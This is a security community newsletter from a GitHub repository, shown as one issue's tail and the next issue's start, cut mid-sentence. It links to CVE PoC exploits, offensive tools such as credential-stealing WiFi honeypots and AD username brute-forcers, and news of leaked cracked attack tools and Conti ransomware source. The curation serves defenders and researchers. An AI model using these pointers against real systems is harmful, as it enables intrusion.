Only a handful of them will ever be exploited, so in this section, every week we filter out [security that has been patched within the week, and CVE analysis & PoCs of critical or higher severity](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/CVE's/Readme.md).\n<details> \n<summary><b>Preview</b></summary>\n\n \n \n        Security Patched within a Week: Latest vulnerabilities that have been patched within the week (21st Sep-27th Sep 2022),\n                                        featuring releases from Apple, Google, Microsoft, GitHub, Linux (Ubuntu, Kali etc.), WordPress etc.\n        \n        CVE: ANALYSIS & POC:            CVE-2022-39197, CVE-2022-36934, CVE-2022-27492, CVE-2022-40286, CVE-2021-41653, CVE-2022-39205,\n                                        CVE-2022-39206, CVE-2022-39207 & CVE-2022-39208.\n         \n        CVE POC (0-Day):                CVE-2022-39197, CVE-2022-36804, CVE-2022-30206, CVE-2022-28282, CVE-2022-34729, Cronos PoC,\n                                        CVE-2022-23743, Webshell - open source project, Windows 10 - Custom Kernel Signers.\n \n\n</details> \n\n---  \n\n<span id=\"title-research\"></span>\n### 🔍🔍🔍 RESEARCH, SECURITY & IT ORGANIZATION 🔍🔍🔍\n\n> In this segment, we collect excellent whitepapers, research, techniques and resources from all infosec domains for researchers and professionals who want to explore security, are looking for new approaches to finding vulnerabilities, or want to track the infosec market and startups. 
\n<details>\n<summary><b>1 - Infosec Business, Funding and Market</b></summary> \n \n - **1 - Infosec Business, Funding and Market** \n     \n    - [Cloudflare’s v2.0 Startup Plan to build your next startup on Cloudflare](https://blog.cloudflare.com/startup-program-v2/)\n    - [CISA Strategic plan report for year 2023 - 2025](https://drive.google.com/file/d/1-vQYIJ7sZrn_PAxpO3W0ytX2-Oc2eXoB/view?usp=sharing)\n    - [Bug Hunting for the 99%](https://www.huntress.com/blog/bug-bounties-for-the-99) by Andrew Morgan\n    - [Why Is ISO 27001 Important For Small Businesses?](https://secureblitz.com/why-is-iso-27001-important-for-small-businesses/)\n    - [Why do security products fail?](https://my.rage.cloud/why-do-security-products-fail-7477dd0ec878) \n    \n    - InfoSec Market\n      - In recent weeks, Microsoft acquired the cyber threat detection firm Miburo and Google Cloud completed its acquisition of Mandiant for $5.4 billion.\n      - Understand the [Indian market and its clients, and who the right client for your business is](https://drive.google.com/file/d/1yRuIGqb5gcWN_F_tgqHgZA7RuLr34sIS/view?usp=sharing) \n    \n  </details>\n  \n<details>\n<summary><b> 1 - Web Security and Android Security,  2 - Cloud Security,  3 - Blue/Red/Purple/Threat Intelligence Team</b></summary>\n   \n - **1 - Web Security and Android Security**\n     \n     - [Pentesting Cisco networks](https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9) by @Magama Bazarov \n     - [How we Abused Repository Webhooks to Access Internal CI Systems at Scale](https://www.cidersecurity.io/blog/research/how-we-abused-repository-webhooks-to-access-internal-ci-systems-at-scale/)\n     - [How to secure against forced browsing info disclosures](https://rez0.blog/cybersecurity/2022/09/22/prevent-info-disclosures.html)\n     - [Flutter review and its reverse engineering](https://swarm.ptsecurity.com/fork-bomb-for-flutter/), which can help you in the process of bug hunting or penetration 
testing.\n     - [Diving Into Electron Web API Permissions](https://blog.doyensec.com/2022/09/27/electron-api-default-permissions.html)\n     - [How to avoid data breaches with GraphQL?](https://blog.escape.tech/data-leaks/), by Sophie Boulaaouli\n     - Hacking the [PS4 / PS5 through the PS2 Emulator - Part 1 - Escape](https://cturt.github.io/mast1c0re.html)\n \n  - **2 - Cloud Security**\n     - Can you replace [Microsoft Active Directory with Azure Active Directory?](https://jumpcloud.com/blog/can-i-replace-ad-with-azure-ad) -> This is a very common question for IT professionals.\n     - [Critical OCI vulnerability allows unauthorized access to customer cloud storage volumes](https://www.wiz.io/blog/attachme-oracle-cloud-vulnerability-allows-unauthorized-cross-tenant-volume-access)\n     - [Attacking Firecracker : AWS' microVM Monitor Written in Rust](https://www.graplsecurity.com/post/attacking-firecracker)\n     - [Threat Detection, Investigation, and Response in the Cloud](https://services.google.com/fh/files/misc/gcat_threat_detection_cloud_a.pdf)\n   \n  - **3 - Blue/Red/Purple/Threat Intelligence Team**\n   - **Blue Team**\n     - [Phishing attacks targeting GitHub accounts](https://blog.barracuda.com/2022/09/27/cybersecurity-threat-advisory-phishing-attacks-targeting-github-accounts/) -> Recently GitHub alerted that there is an ongoing phishing campaign targeting its users by impersonating the CircleCI continuous integration and delivery platform. \n     - What Is [Data Exfiltration? 
MITRE ATT&CK® Exfiltration Tactic | TA0010](https://socprime.com/blog/what-is-data-exfiltration-mitre-attack/)\n     - Practical guidance for [IT admins to respond after ransomware attacks](https://m365internals.com/2022/09/19/practical-guidance-for-it-admins-to-respond-to-ransomware-attacks/)\n     - [Data-Centric Security: Threat Hunting based on Zipf’s Law](https://ditrizna.medium.com/data-centric-security-threat-hunting-based-on-zipfs-law-50ad919fc135)\n     - [Fake mobile banking rewards apps lure users to install info-stealing RAT on Android devices](https://www.microsoft.com/security/blog/2022/09/21/rewards-plus-fake-mobile-banking-rewards-apps-lure-users-to-install-info-stealing-rat-on-android-devices/)\n   \n  - **Red Team**\n     - Tell Me Where You Live and I Will Tell You About Your P@ssw0rd: [Understanding the Macrosocial Factors Influencing Password’s Strength](https://www.gosecure.net/blog/2022/09/26/tell-me-where-you-live-and-i-will-tell-you-about-your-password-understanding-the-macrosocial-factors-influencing-passwords-strength/)\n     - Microsoft researchers recently investigated how [malicious OAuth applications abuse cloud email services to spread spam](https://www.microsoft.com/security/blog/2022/09/22/malicious-oauth-applications-used-to-compromise-email-servers-and-spread-spam/) \n     - [How to set up a honeypot to steal WiFi logins for enterprise networks](https://tbhaxor.com/steal-credentials-for-enterprise-wifi-networks/)\n     - [Microsoft Shift F10 bypass + Autopilot privilege escalation](https://k4m1ll0.com/ShiftF10Bypass-and-privesc.html)\n     - [Windows Kernel Exploitation instructions](https://hackmd.io/@truebad0ur/WindowsKernelExploiting) and [Assembled HEVD driver and loader](https://drive.google.com/file/d/19NmwL88KmiOAcRlodNCB-m9oNxC31But/view?usp=sharing)\n \n</details>\n\n---\n<span id=\"title-beginners\"></span>\n## Beginners-Friendly \n\n<details> \n<summary><b>\n📰📰📰 NEWS : Twitter, data breaches, top 5 infosec news, event recap & 
hiring/jobs  📰📰📰  </b></summary>   \n\n <details> \n <summary><b> 1. Twitter Threads & Tips\n </b></summary>   \n \n - 🟢 The London police posted an [update on the suspected Uber breach and Rockstar Games breach](https://twitter.com/CityPolice/status/1573281533665972225)\n - 🟢 [Hacker steals $950,000 in #Ether from a #crypto wallet via the same vanity address exploit linked to an attack on trading firm @wintermute_t](https://twitter.com/WalletRank/status/1574425081916411904)\n - 🟢 [Electronics Cheat Sheet](https://twitter.com/ALSALHAN/status/1571175176120705029/photo/1)\n - 🟢 [LockBit ransomware group pays its first ever $50k bug bounty](https://twitter.com/ido_cohen2/status/1571039567666638848)\n \n</details>  \n \n<details> \n<summary><b>\n2. Data breaches & Blackhat hacker leaks\n</b></summary> \n   \n - 🔴 **News - Paid Tools** that have been leaked or cracked by black hat hackers: \n      - Cobaltstrike 4.7.1 Licence, CANVAS 7.27, Invicti Standard 6.7.0.37625, acunetix_14.9.220913107, BurpSuite_pro_v2022_9.1, Acunetix Version 14 build 14.9.220713150 for Windows, Nessus Core + tenableSC 20220307 ISO & Linux, Malcat malware analyzer, xray_1.9.1_windows_x64, WinLicense 3.1.2.0 (x32/x64) Licensed, bruteratel 1.2.2, and 010 Editor 13.0-beta2.\n \n - 🔴 **News - Black Hat Hacker leaked** : \n     - vx-underground's update on the suspected Uber breach and Rockstar Games breach: the 17-year-old teen responsible for the Rockstar & Uber breaches has angered a group of ransomware threat actors. They state he initiated conversations on selling access, but burned the access in the midst of negotiations. He claimed to have access to Kone, Bank of Brasil, Take2Games & DoorDash.\n     - GTA 6 has been leaked over an onion site; American Airlines admits a data breach.\n     - The Conti source code for v3.7.7 and the Taurus bot source code have been leaked. \n     - The Yanluowang ransomware group published hacked information from Cisco.\n \n</details> \n \n<details> \n<summary><b>\n3. 
Top 5 infosec news\n</b></summary> \n\n - 🟢 **Announcement** : \n   - [Active Directory integration features in Ubuntu 22.04](https://ubuntu.com/engage/New-Active-Directory-integration-features)  \n   - Synack is now offering Synack90, a 90-day pentest offering for businesses.\n - 🟢 TikTok: according to confirmed news sources, the UK’s Information Commissioner said it is ready to fine the Chinese firm £27 million, as it failed to protect the data privacy of children aged 13 and below.\n - 🟢 [Europol and Bitdefender Release Free Decryptor for LockerGoga Ransomware](https://www.nomoreransom.org/uploads/LockerGoga-Decrypt-Doc.pdf)\n\n</details> \n \n<details> \n<summary><b>\n4. Event recap\n</b></summary>\n \n> This week the BSides Ahmedabad 2022 conference, Texas Cyber Summit 2022 and Yahoo’s 1337UP0822 live hacking event were mainly trending on Twitter, and we have collected publicly available important talks, slides, tools, podcasts, videos and upcoming events related to conferences, talks & webinars so you don't miss them and can watch them at a time that suits you.\n\n - **Conferences**\n   -  David Worthington wrote an article on the [2022 Fal.Con Event Recap](https://jumpcloud.com/blog/2022-fal-con-event-recap)\n   -  Joey Jablonski's thoughts from the [2022 Texas Cyber Summit](https://blog.pythian.com/thoughts-from-the-2022-texas-cyber-summit/)\n\n - **Webinars and videos**\n   - Recap of [Yahoo’s 1337UP0822 live hacking event](https://blog.intigriti.com/2022/09/21/yahoo-1337up0822-live-hacking-event-round-up/), which rallied researchers from around the world.\n   - Tzah Pahima's talk at Nullcon: [Breaking Formation: From an Error Message to Internal AWS Infra](https://www.youtube.com/watch?v=TFQYBudCUf8)\n   - In this video series, Mr. Jakoby teaches [PowerShell for hackers](https://www.youtube.com/playlist?list=PL3NRVyAumvmppdfMFMUzMug9Cn_MtF6ub). 
A total of 21 videos have been uploaded.\n\n  - **Ongoing/Upcoming 𝙀𝙑𝙀𝙉𝙏𝙎**:   \n \n    - InfoSec World 2022 : 26th-28th September | Orlando \n    - 9th Annual Control Systems Cybersecurity : 29th September | UK\n    - BruCON : 29th to 30th September | Mechelen, BE \n    - NetDiligence Cyber Risk Summit : 10th-12th October | Santa Monica\n    - Cyber Security World : 12th to 13th October | Singapore, SG \n    - CISO visions : 17th to 21st October | Virtual – English \n    - Mandiant mWISE Cybersecurity Conference 2022 : 18th-20th October |  Washington DC \n    - E-crime & Cybersecurity London : 19th October | London, UK \n    - 7th Annual Counter Insider Threat Symposium : 19th October | Maryland \n    - IT-SA : 25th to 27th October | Nuremberg, DE \n\n</details> \n   \n<details> \n<summary><b>\n5. Hiring/Jobs\n</b></summary>\n \n> In this beginner-friendly segment, we talk about and share the latest resources related to jobs this month, interview questions and free training offered by organizations, communities and leaders.\n \n 1. Take a look at [Internship/Job Openings in September 2022](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/CyberSecurityJobs/Jobs.md#Weekly-Cybersecurity-Hiring-Aug-2022).\n\n 2. Here ResetHacker has collected [Interview Questions asked by organizations](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/CyberSecurityJobs/InterviewQA.md).\n\n</details> \n</details> \n\n\n<details> \n<summary><b> 🐞🐞🐞 BUG BOUNTY : reports, vulnerability writeups and resources 🐞🐞🐞  </b></summary>   \n\n <details> \n <summary><b>1. Hackerone/Bugcrowd reports for Bug Hunters. </b></summary>\n \n *1. 
In this segment, we have filtered out the top **HACKERONE/BUGCROWD REPORTS** for bug hunters:*\n   - 🐞$13,950 - [XSS in ZenTao integration affecting self hosted instances without strict CSP](https://hackerone.com/reports/1542510)\n   - 🐞$10,000 - [size_t-to-int vulnerability in Sony exFAT leads to memory corruption via malformed USB flash drives](https://hackerone.com/reports/1340942)\n   - 🐞$8,690 - [Content injection in Jira issue title enabling sending arbitrary POST request as victim](https://hackerone.com/reports/1533976)\n   - 🐞$5,000 - [XSS Reflected on reddit.com via url path](https://hackerone.com/reports/1051373)\n</details> \n \n<details> \n<summary><b>2.  BUG BOUNTY : writeups, tips & resources. </b></summary>\n \n *2. In this beginner-friendly segment, we collect and filter out **BUG BOUNTY WRITEUPS, TIPS & RESOURCES***   \n   \n   - [Viewing Instagram live streams anonymously without notifying the host](https://feed.bugs.xdavidhu.me/bugs/0015)\n   - A quick [bash function to read nmap scans in the terminal](https://h4knet.medium.com/pretty-print-nmap-grepable-gnmap-files-56ffd6ca9e20)\n   - @HasharMujahid wrote a writeup explaining [Multi-Factor Authentication Vulnerabilities](https://infosecwriteups.com/multi-factor-authentication-vulnerabilities-7a4b647a7b09)\n   - A detailed article on [SSRF vulnerabilities and where to find them](https://labs.detectify.com/2022/09/23/ssrf-vulns-and-where-to-find-them/)\n   - Secpy Community explained the SANS Top 25 [Software Errors (Part 1 of 25): CWE-787 Out-of-bounds Write](https://infosecwriteups.com/sans-top-25-software-errors-part-1-of-25-cwe-787-out-of-bounds-write-4e1a7c63ff38)\n   - The deep links crash course, [Part 1: Introduction to deep links](https://medium.com/androiddevelopers/the-deep-links-crash-course-part-1-introduction-to-deep-links-2189e509e269) & [Part 2: Deep links from Zero to 
Hero](https://medium.com/androiddevelopers/the-deep-links-crash-course-part2-deep-links-from-zero-to-hero-37f94cc8fb88)\n \n</details> \n</details>\n\n<details> \n<summary><b> 🛠️🛠️🛠️ TOOLS 🛠️🛠️🛠️  </b></summary> \n\n> Community members test the tools, and every week we filter out the most in-demand and helpful tools that serve hackers' purposes in different domains.\n\n<details>\n<summary><b>1. SAST/DAST/IAST/RASP/Recon/Network/Web Pentesting - 5 Tools</b></summary>\n  \n - **1. SAST/DAST/IAST/RASP/Recon/Network/Web Pentesting** - 5\n    \n    - [Cpplumber 0.1.0 - Static analysis tool based on clang, which detects source-to-binary information leaks in C and C++ projects.](https://github.com/ergrelet/cpplumber)\n    - [UseReFuzz](https://github.com/root-tanishq/userefuzz) -> SQLi tester for HTTP headers, by [Kun](https://twitter.com/root_tanishq)\n    - [Mizusawa](https://github.com/0x727/ShuiZe_0x727) -> Information gathering automation tool.\n    - [WARF](https://github.com/iamnihal/warf) -> A Web Application Reconnaissance Framework that helps to gather information about the target.\n    - [dnsReaper](https://github.com/punk-security/dnsReaper) -> Subdomain takeover tool for attackers, bug bounty hunters and the blue team!\n</details> \n\n<details>\n<summary><b>2. Cloud Security  - 3 Tools </b></summary>\n \n - **2. Cloud Security** - 3\n     - [CloudFox](https://github.com/BishopFox/cloudfox) -> Automating situational awareness for cloud penetration tests. \n     - [cloudvelo](https://github.com/Velocidex/cloudvelo) -> An experimental Velociraptor implementation using cloud infrastructure.\n     - [Cloudlist](https://github.com/projectdiscovery/cloudlist) -> A multi-cloud tool for getting assets from cloud providers. This is intended to be used by the blue team to augment Attack Surface Management efforts by maintaining a centralized list of assets across multiple clouds with very little configuration effort.\n </details> \n\n<details>\n<summary><b>3. 
Blue/Red/Purple Team, IR and Threat Intelligence - 5 Tools </b></summary>\n \n - **3. Blue/Red/Purple Team, IR and Threat Intelligence Tools** - 5\n     - [Varc - Volatile Artifact Collector](https://github.com/cado-security/varc) -> varc collects a snapshot of volatile data from a system. It tells you what is happening on a system, and is of particular use when investigating a security incident.\n     - [Codecepticon](https://github.com/Accenture/Codecepticon) -> An offensive security obfuscator for C#, VBA, and PowerShell.\n     - [LDAP Nom Nom - anonymously bruteforce Active Directory usernames at high speed](https://github.com/lkarlslund/ldapnomnom), which allows you to anonymously bruteforce Domain Controllers to find usernames in Active Directory at high speed.\n     - [exploits-predict](https://github.com/wisoffe/exploits-predict) -> Predicts the probability of an exploit being released after a CVE is published (using a machine learning model); the project is based on the [Cookiecutter data science project template.](https://drivendata.github.io/cookiecutter-data-science/)\n     - [Elixir Secure Coding Training (ESCT)](https://github.com/Podium/elixir-secure-coding) - An interactive cybersecurity curriculum designed for enterprise use.\n</details> \n\n<details>\n<summary><b>4. Reverse Engineering & OSINT - 3 Tools </b></summary> \n \n - **4. Reverse Engineering & OSINT Tools** - 3\n     - [PE-bear](https://github.com/hasherezade/pe-bear) is a multiplatform reversing tool for PE files. Its objective is to deliver a fast and flexible “first view” for malware analysts, stable and capable of handling malformed PE files.\n     - [uosint](https://github.com/uosint-project/uosint) -> Find the profiles of a person on social networks.\n     - [TRIFECTA](https://github.com/V1XX-1/TRIFECTA-Search-Tool) -> A batch script that allows you to search a phrase or keywords with 12 different search engines. You can do so one at a time or all at once.
\n\n </details> \n\n<details>\n<summary><b>5. IoT, OS & Hardware - 3</b></summary>   \n \n  - **5. IoT, OS & Hardware** - 3\n      \n      - [CiLocks](https://github.com/tegal1337/CiLocks) -> Crack Interface lockscreen, Metasploit and More Android/IOS Hacking.\n      - [Cotopaxi](https://github.com/Samsung/cotopaxi) - Set of tools for security testing of Internet of Things devices using specific network IoT protocols.\n      - [HKSSY/Drone-Hacking-Tool](https://github.com/HKSSY/Drone-Hacking-Tool) -> Drone Hacking Tool is a GUI tool that works with a USB Wifi adapter and HackRF One for hacking drones.\n\n </details> \n</details>  \n\n---\n  \n<details>\n<summary> 🤝🤝🤝 Contact-Us, Team/Contributor and Community Engagement patners and Resources. 🤝🤝🤝 </summary>\n<div align=\"\"><br>\n <a href=\"mailto:resethackerofficail@gmail.com?subject=ResetHacker Community\" target=\"_blank\"><img src=\"https://img.shields.io/badge/Gmail-D14836?logo=gmail\"></a>\n</div>\n\n> Huge thanks to our awesome [Community Leader for contribution and giving back to community](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/SupportedBy/Team%26Contributors.md) and thankyou for being the part of team.\n   \n   - Contributors : Good Resources Share, Paul miller, Tarang Parmar, Tuhin Bose, Vikram and Alexandre ZANNI.\n\n> I'm very grateful to all the [Organization, group, and community that support us for the engagement](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/SupportedBy/CommunityEngagementPartners.md). 
Without their support distributing \"Weekly InfoSec Update\" among hackers would not have been possible.\n\n> Resources from [Organization and researchers](https://github.com/RESETHACKER-COMMUNITY/Community-Contributers/blob/main/StayUptoDate.md) that help us drafting [Weekly infosec Update](https://github.com/RESETHACKER-COMMUNITY/Community-Contributers/blob/main/StayUptoDate.md).\n\n</details>   \n \n#### Wrapping Up\n\n  Have questions, Suggestions, or feedback? Just reply directly to mail, I'd love to hear from you.\n  \n  If you find this update useful and know other people who would too, I'd really appreciate if you'd forward it to them ??\n  Thanks for reading!\n"
  },
  {
    "path": "ResetCybersecuirty/Weekly_Infosec_Update(WIU)/Weekly_Infosec_Update_09.md",
    "content": "#### Hey Hackers, I hope you’ve been doing well this weekend! The quote of the week is \"Don't rush the Process. Good Things Take Time.\"\n > Here is the agenda for *Weekly InfoSec Update v0.7* : **28th September - 11th October 2022**\n \n![](https://img.shields.io/github/forks/RESETHACKER-COMMUNITY/Pentesting-Bugbounty)\n![](https://img.shields.io/github/stars/RESETHACKER-COMMUNITY/Pentesting-Bugbounty)\n![](https://img.shields.io/github/last-commit/RESETHACKER-COMMUNITY/Pentesting-Bugbounty) \n\n**Tips to SAVE TIME & How to READ this Newsletter? 👇**\n- Select a topic from the **Navbar** below, then click on **Summary/Preview** and the **Arrow (>)** to see the details.\n\n- Open all relevant titles in a new tab (Ctrl+Click), then read them one by one.\n\n[![cve poc](https://img.shields.io/badge/-CVE-%232C4C9C?style=for-the-badge&logo=github&logoColor=black)](#title-cve) [![research & Business](https://img.shields.io/badge/-Research-%232C4C9C?style=for-the-badge&logo=github&logoColor=black)](#title-research) [![beginners](https://img.shields.io/badge/-News-%232C4C9C?style=for-the-badge&logo=github&logoColor=black)](#title-beginners) [![bug bounty](https://img.shields.io/badge/-Bug%20Bounty-%232C4C9C?style=for-the-badge&logo=github&logoColor=black)](#title-bb) [![tools](https://img.shields.io/badge/-Tools-%232C4C9C?style=for-the-badge&logo=github&logoColor=black)](#title-tools) \n\n![WIU_Trail_Pro](https://user-images.githubusercontent.com/25515871/191970244-14b8821b-acd9-4fb6-8e9b-f627392c4715.png)\n \n---\n\n<span id=\"title-cve\"></span>\n### 🪲🪲🪲 CVE : PoC exploits and CVE analysis 🪲🪲🪲\n\n#### Week -> [**27th September - 11th October 2022**👈](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/CVE's/Readme.md).\n\n <summary>\nSecurity patched within the week: \n \n   > We have tracked the latest security advisories of top vendors and filtered out the high and critical vulnerabilities that have been patched.\n   > This week, we have updates from Microsoft (40+), GitHub (sqlite3 & tensorflow), Cisco, Ubuntu 22.04, 20.04 LTS and 18.04, and Firefox.\n</summary>\n\n<summary>\nCVE analysis, write-ups and reports (a total of 7 in the last 2 weeks):\n \n   > This week, we have collected the recently published write-ups for CVEs of critical or higher severity. \n</summary>\n\n <summary> \n PoCs for CVEs & exploits (a total of 18+ in the last 2 weeks):\n \n   > Every week, we track the recently published exploits and PoCs for CVEs.  \n</summary>\n\n<details>\n<summary><b>Summary/Preview</b></summary>\n \n'''\n    CVE ANALYSIS & POC:   CVE-2022-34960, CVE-2022-41218, HackerOne report #1672388 (GitLab), CVE-2022-33987,\n                          CVE-2022-36635, and a detailed report on the top CVEs most used by Chinese state-sponsored cyber actors since 2020\n\n    CVE POC (0-day):      Zero-day Microsoft Exchange Server checker (virtual patching checker), DropBox-XPC-Exploit,\n                          a collection of jQuery UI XSS payloads, a Nuclei template for CVE-2022-35405, an updated list of CVE PoCs,\n                          PS5-4.03-Kernel-Exploit, CVE-2022-41040, CVE-2022-26726, CVE-2022-30600, CVE-2022-39197, CVE-2021-29156 exploit,\n                          CVE-2022-30206, CVE-2022-2992, CVE-2022-41208, CVE-2022-2274 and CVE-2022-36804\n'''\n</details> \n\n---  \n\n<span id=\"title-research\"></span>\n### 🔍🔍🔍 RESEARCH, SECURITY & IT ORGANIZATION 🔍🔍🔍\n\n   > In this segment, we have collected the most relevant and latest articles, whitepapers, research, techniques and resources of the week from all infosec domains, for independent researchers and professionals who want to stay up to date with the latest security work, are looking for a new approach to finding CVEs/bugs, or want to track the infosec market and startups. \n<details> \n<summary><b>1 - Infosec Business, Funding and Market</b></summary> \n \n - **1 - Infosec Business, Funding and Market** \n     \n    - [The Latest Funding News and What it Means for Cyber Security in 2023](https://thehackernews.com/2022/10/the-latest-funding-news-and-what-it.html)\n    - [Cloudflare’s v2.0 Startup Plan to Build your next startup on Cloudflare](https://blog.cloudflare.com/startup-program-v2/)\n       > Cloudflare has announced a new funding program with 26 VC firms, under which $1.25 billion will be made available to startups building applications on Cloudflare Workers.\n    - [On the Art of Selling to Cybersecurity People](https://www.returnonsecurity.com/the-art-of-selling-to-cybersecurity-people/)\n       > This article mainly explains how to build a relationship, why you should skip show-and-tell, why canned scripts get canned, and why integration matters.\n    - [Why Is ISO 27001 Important For Small Businesses?](https://secureblitz.com/why-is-iso-27001-important-for-small-businesses/)\n    - [Why do security products fail?](https://my.rage.cloud/why-do-security-products-fail-7477dd0ec878) \n    \n    - **Infosec Market Helpdesk**\n       > This research shares insight into the [Indian market and its clients, and helps you understand who is the right client for your business](https://drive.google.com/file/d/1yRuIGqb5gcWN_F_tgqHgZA7RuLr34sIS/view?usp=sharing)    \n \n       > [5G Cybersecurity Market to See Incredible Growth By 2022-2028](https://www.openpr.com/news/2753049/5g-cybersecurity-market-to-see-incredible-growth-by-2022-2028)\n \n       > Investors and venture capital (VC) firms for cybersecurity startups:  [Liberty City Ventures](https://www.libertycityventures.com/),  [Evolution Equity](https://evolutionequity.com/),  [M12VC](https://m12.vc/),  [Team8.VC](https://team8.vc/),  [Centerstone Capital](https://www.centerstone.capital/),  [Insight partners](https://www.insightpartners.com/),  [World Trade Venture](http://worldtradeventures.com/), [Menara Venture](https://menaraventures.com/)  etc.\n      \n  </details>\n  \n<details>\n<summary><b> 2. Research/Article discussed by professionals or independent researchers </b></summary>\n   \n - **1 - Web Security and Android Security**\n     - SANS released a survey, [Think Like a Hacker: Inside the Minds and Methods of Modern Adversaries | September 2022](https://drive.google.com/file/d/1LiandSv7-TNGpzY5IsUzPNDReDVTiJgl/view?usp=sharing)\n     - Wallarm released a detailed report on [API vulnerabilities Discovered and Exploited in Q1-2022](https://drive.google.com/file/d/1MuOdfTDC6VRbNKnvHS1jYeOHfoEOi_Ci/view?usp=sharing)\n     - [How to secure against forced browsing info disclosures](https://rez0.blog/cybersecurity/2022/09/22/prevent-info-disclosures.html)\n     - [Flutter review and its reverse engineering](https://swarm.ptsecurity.com/fork-bomb-for-flutter/)\n     - [How to avoid data breaches with GraphQL?](https://blog.escape.tech/data-leaks/), by Sophie Boulaaouli   \n \n  - **2 - Cloud Security & Automation**\n     - [A Guide to Improving Security Through Infrastructure-as-Code](https://research.nccgroup.com/2022/09/19/a-guide-to-improving-security-through-infrastructure-as-code/)\n     - [Using policy-as-code within infrastructure-as-code](https://doordash.engineering/2022/09/20/how-doordash-ensures-velocity-and-reliability-through-policy-automation/) : How DoorDash Ensures Velocity and Reliability through Policy Automation.\n     - [Attacking Firecracker : AWS' microVM Monitor Written in Rust](https://www.graplsecurity.com/post/attacking-firecracker)\n     - [Threat Detection, Investigation, and Response in the Cloud](https://services.google.com/fh/files/misc/gcat_threat_detection_cloud_a.pdf)\n   \n- **3 - Blue/Red/Purple/Threat Intelligence Team**\n   - **Blue Team**\n     - [Securely Implementing IdP-initiated SAML2 Login](https://goteleport.com/blog/idp-initiated/)\n     - [Trace Oddity: Methodologies for Data-Driven Traffic Analysis on Tor](https://drive.google.com/file/d/19qUBeq7jGaxP1kWBGaH1XPA6ZbsCpisAG/view?usp=sharing)\n         > The paper presents a new end-to-end (e2e) flow-correlation attack on Tor users that analyzes network traffic more effectively in order to deanonymize them. The authors implemented their own deep learning model with [TensorFlow 2.2.0](https://pypi.org/project/tensorflow/2.2.0/) and [Keras 2.3.0-tf](https://github.com/keras-team/keras/releases/tag/2.3.0), and also adapted [DeepCorr](https://github.com/woodywff/deepcorr), which was previously used to implement correlation attacks on Tor, to their needs. \n     \n     - [Building a Holistic Insider Risk Management Program](https://drive.google.com/file/d/1jAlNYwuPdZ-UWlawyTDCqGvRduHFZdDN/view?usp=sharing)\n        > This article explains why companies should treat insider risk as part of their data protection strategy, with a holistic approach that includes the right people, processes, and training in addition to the appropriate tools.\n \n     - [What can we learn from the leaked Insyde BIOS for Intel Alder Lake](https://hardenedvault.net/blog/2022-10-08-alderlake_fw-leak/)\n     - [Layer 2 network security bypass using VLAN 0, LLC/SNAP headers and invalid length](https://blog.champtar.fr/VLAN0_LLC_SNAP/) \n         > The same L3 payload can be encapsulated on Ethernet/Wi-Fi in several different ways (a VLAN 0 tag, LLC/SNAP headers, an invalid length field), which lets an attacker slip past some L2 security control implementations, such as IPv6 Router Advertisement Guard, that do not handle those alternative encapsulations.\n     - [Phishing attacks targeting GitHub accounts](https://blog.barracuda.com/2022/09/27/cybersecurity-threat-advisory-phishing-attacks-targeting-github-accounts/) \n     - Practical guidance for [IT admins responding to ransomware attacks](https://m365internals.com/2022/09/19/practical-guidance-for-it-admins-to-respond-to-ransomware-attacks/)\n\n  - **Red Team**\n     - [Hidden DNS resolvers and how to compromise a fully-patched WordPress instance](https://sec-consult.com/blog/detail/melting-the-dns-iceberg-taking-over-your-infrastructure-kaminsky-style/)\n     - [Comparing Semgrep and CodeQL](https://blog.doyensec.com/2022/10/06/semgrep-codeql.html)\n     - How to [Attack Admin Panels Successfully](https://infosecwriteups.com/how-to-attack-admin-panels-successfully-72c90eeb818c) by c0d3x27\n     - Tell Me Where You Live and I Will Tell You About Your P@ssw0rd: [Understanding the Macrosocial Factors Influencing Password’s Strength](https://www.gosecure.net/blog/2022/09/26/tell-me-where-you-live-and-i-will-tell-you-about-your-password-understanding-the-macrosocial-factors-influencing-passwords-strength/)\n   \n</details>\n\n---\n<span id=\"title-beginners\"></span>\n### Friendly Segment\n   > We have tried to solve the problem \"how to stay up to date with the bug bounty community without wasting time on social media\". This segment is aimed at intermediate bug hunters and ethical hackers; the NEWS and TOOLS segments are shared by professionals and intermediates alike.\n  <details> \n  <summary><b>\n📰📰📰 Hacker NEWS 📰📰📰  \n   \n   > Based on hackers' requirements, we have reorganized the infosec news into 5 different segments👇\n   </b></summary>   \n\n  <details> \n  <summary><b> 1. 
Top 7 infosec news</b></summary> \n   \n   - Acquisitions and funding in the last few weeks:\n     > [Vanta](https://vanta.com), a security compliance automation startup, today announced that it raised $40 million in an extension of its Series B funding round.\n   \n     > After acquiring Mandiant (unique threat intelligence), Google Cloud is now linking up its security business with Mandiant.\n   \n   - The Prime Minister of India officially inaugurated 5G in India at the \"India Mobile Congress 2022\" event,\n       > where multiple workshops were organized to demonstrate the opportunities that 5G brings to virtual reality (VR), augmented reality (AR), the metaverse, AI/ML, automation, drones, cybersecurity, real-time support/education etc. Jio, Airtel and Vi have rolled out 5G in 8 major cities of India.\n   - Open Network for Digital Commerce [ONDC](https://ondc.org/) went live with its beta test in 16 pin codes in Bengaluru (India)     \n       > A technology similar to UPI that promises to democratise access to the internet for small enterprises.   \n   - The [ULIP portal](https://goulip.in/) has been launched in India; it should help reduce logistics costs by digitising logistics.\n   - Recently, the Centre has asked mobile phone manufacturers to ensure that all phones sold in India are NavIC-compatible.\n     > The US denied India access to GPS during the Kargil war in 1999. India then decided to develop its own satellite navigation system; ISRO built NavIC, which has been operational since 2018.\n   - An article from the Economic Times says that India is offering operational and cyber security training to the Philippine military.\n               \n</details> \n \n<details> \n<summary><b> 2. Event recap </b></summary>\n \n   > This week, the BSides Ahmedabad 2022 conference, Recon by Nahamsec and the Nullcon Goa 2022 conference videos were trending in the community. We have collected the publicly available talks, slides, tools, podcasts, videos and upcoming events related to conferences, talks & webinars, so you don't miss them and can watch them at a time that suits you.\n\n - **Conferences**\n \n   - BSides Ahmedabad Conference 2022\n        > The event started with keynote speakers @YassineAboukir & @The Cyber 